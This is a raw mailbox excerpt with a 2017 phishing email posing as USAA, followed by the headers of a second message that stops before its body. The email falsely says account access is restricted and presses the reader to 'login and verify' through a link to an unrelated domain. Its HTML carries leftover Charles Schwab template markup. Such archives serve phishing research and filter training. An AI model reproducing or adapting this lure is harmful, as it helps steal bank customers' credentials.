From: "USAA" <moor@racetomillis.com>
Date: Thu, 14 Sep 2017 14:10:35 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.microceeto.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - racetomillis.com
X-Get-Message-Sender-Via: server.microceeto.com: authenticated_id: moor@racetomillis.com
X-Authenticated-Sender: server.microceeto.com: moor@racetomillis.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 312

You will not see this in a MIME-aware mail reader.
--===============1241764535==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

    =

    =

   	   =

 Dear USAA member, =

 For your protection your access to USAA is temporarily restricted, you won=
t be able to use your account until you complete this verification process =
and continue enjoying our service. We are sorry for any inconvenience.  =

 Click here to login and verify     Please be advised that It is highly imp=
ortant you provide accurate information to match with what we have for you =
in our system to assure the verification instant approval. =

 =A92017 USAA. All right reserved.	 =






--===============1241764535==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><BR class=3DApple-interchange-newline>
<TABLE id=3D"m_-8921673350910093638m_-9032774052656371951m_2193917287612631=
131m_-8083351299048285274m_-3263008197732375665m_2809778492161595324m_54817=
08334759286553m_-952798747807160201m_-7655226729182250572m_-222373796973084=
8591gmail-m_-310208418512015769gmail-m_1830310171187477854m_-57638207203111=
96466m_2436417925649281092m_-8554608372530824699m_1063758417034492810m_2348=
268149668837747m_6517911448195628062m_-6267371852379503847m_-12597877682472=
43593m_7603204617694949786gmail-m_6007385331870989696gmail-m_11228469903874=
00877m_6463492963708141197m_5690424208665641238m_6043351194043777639gmail-m=
_4878619579447007143gmail-m_-5663028599570667277m_5233802384898040336gmail-=
m_7619628231189182009gmail-general-m_1242974698721619804general-m_242149873=
9789454171m_-9190393595922882721m_2181013847862666563m_1842707803988432082g=
eneral-m_8943419957003114414Email Notification From Charles Schwab" style=
=3D"FONT-SIZE: small; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: normal; =
WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(34=
,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: norma=
l; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-dec=
oration-color: initial" cellSpacing=3D0 cellPadding=3D0 width=3D"100%" alig=
n=3Dcenter bgColor=3D#ececec border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dtop alig=
n=3Dcenter>
<TABLE id=3D"m_-8921673350910093638m_-9032774052656371951m_2193917287612631=
131m_-8083351299048285274m_-3263008197732375665m_2809778492161595324m_54817=
08334759286553m_-952798747807160201m_-7655226729182250572m_-222373796973084=
8591gmail-m_-310208418512015769gmail-m_1830310171187477854m_-57638207203111=
96466m_2436417925649281092m_-8554608372530824699m_1063758417034492810m_2348=
268149668837747m_6517911448195628062m_-6267371852379503847m_-12597877682472=
43593m_7603204617694949786gmail-m_6007385331870989696gmail-m_11228469903874=
00877m_6463492963708141197m_5690424208665641238m_6043351194043777639gmail-m=
_4878619579447007143gmail-m_-5663028599570667277m_5233802384898040336gmail-=
m_7619628231189182009gmail-general-m_1242974698721619804general-m_242149873=
9789454171m_-9190393595922882721m_2181013847862666563m_1842707803988432082g=
eneral-m_8943419957003114414Email Header" cellSpacing=3D0 cellPadding=3D0 w=
idth=3D"100%" align=3Dcenter bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dtop>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D560 align=3Dcenter bgColor=
=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; TEXT-ALIGN: center; MARGIN: 0p=
x"></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D16 colSp=
an=3D4>
<DIV></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif"><BR></FONT></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif">Dear USAA member,</FONT></=
DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif"><BR></FONT></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif">For your protection your a=
ccess to USAA is temporarily restricted, you wont be able to use your accou=
nt until you complete this verification process and continue enjoying our s=
ervice. We are sorry for any&nbsp;inconvenience.&nbsp;</FONT></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif"><BR></FONT></DIV>
<DIV><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://santoshcare.com/tes=
t/unlocked" target=3D_blank data-saferedirecturl=3D"https://www.google.com/=
url?hl=3Den&amp;q=3Dhttps://santoshcare.com/test/unlocked&amp;source=3Dgmai=
l&amp;ust=3D1505494835070000&amp;usg=3DAFQjCNG6qqYvCFyQ0FMH-HbNbM4TSeRrKA">=
<B><FONT face=3D"arial, helvetica, sans-serif">Click here to login and veri=
fy</FONT></B></A></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif">&nbsp; &nbsp;</FONT></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif">Please be advised that It =
is highly important you provide accurate information to match with what we =
have for you in our system to assure the verification instant approval.</FO=
NT></DIV>
<DIV><FONT face=3D"arial, helvetica, sans-serif"><BR></FONT></DIV>
<DIV><SPAN style=3D"FONT-SIZE: x-small"><FONT face=3D"arial, helvetica, san=
s-serif">=A92017 USAA. All right reserved.</FONT></SPAN></DIV></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"></TD></TR></TBODY=
></TABLE><FONT face=3D"arial, helvetica, sans-serif"><BR><BR></FONT></TD></=
TR></TBODY></TABLE></TD></TR></TBODY></TABLE><BR class=3DApple-interchange-=
newline></BODY></HTML>
--===============1241764535==--

From jose@monkey.org Fri Sep 15 17:19:05 2017 +0000
Return-Path: aredconsultants@pro09.winwinhosting.com
Delivered-To: jose@monkey.org
X-FDA: 73288791450.16.C0E1459
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin16.b.hostedemail.com (Postfix) with ESMTP id 939B22D2BE4
	for <jose@monkey.org>; Fri, 15 Sep 2017 17:18:14 +0000 (UTC)
X-Spam-Summary: 50,3,0,d41d8cd98f00b204,d41d8cd98f00b204,aredconsultants@pro09.winwinhosting.com,:,RULES_HIT:41:46:150:153:355:379:543:988:989:1216:1260:1313:1314:1345:1381:1516:1517:1522:1536:1575:1676:1692:1699:1711:1730:1747:1764:1777:1792:2392:2393:2549:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6261:6642:10004:10234:11658:11914:12114:13244:14827:21080:21212:21627:21660,0,RBL:173.224.124.126:@pro09.winwinhosting.com:.lbl8.mailshell.net-62.16.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fu,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:69,LUA_SUMMARY:none
X-HE-Tag: trail57_820299cd6f604
X-Filterd-Recvd-Size: 54209
Received: from pro09.winwinhosting.com (pro09.winwinhosting.com [173.224.124.126])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 15 Sep 2017 17:18:13 +0000 (UTC)
Received: from aredconsultants by pro09.winwinhosting.com with local (Exim 4.89)
	(envelope-from <aredconsultants@pro09.winwinhosting.com>)
	id 1dsuFX-0004ne-VL
	for jose@monkey.org; Fri, 15 Sep 2017 21:17:56 +0400
Date: Fri, 15 Sep 2017 17:17:55 +0000
To: jose@monkey.org
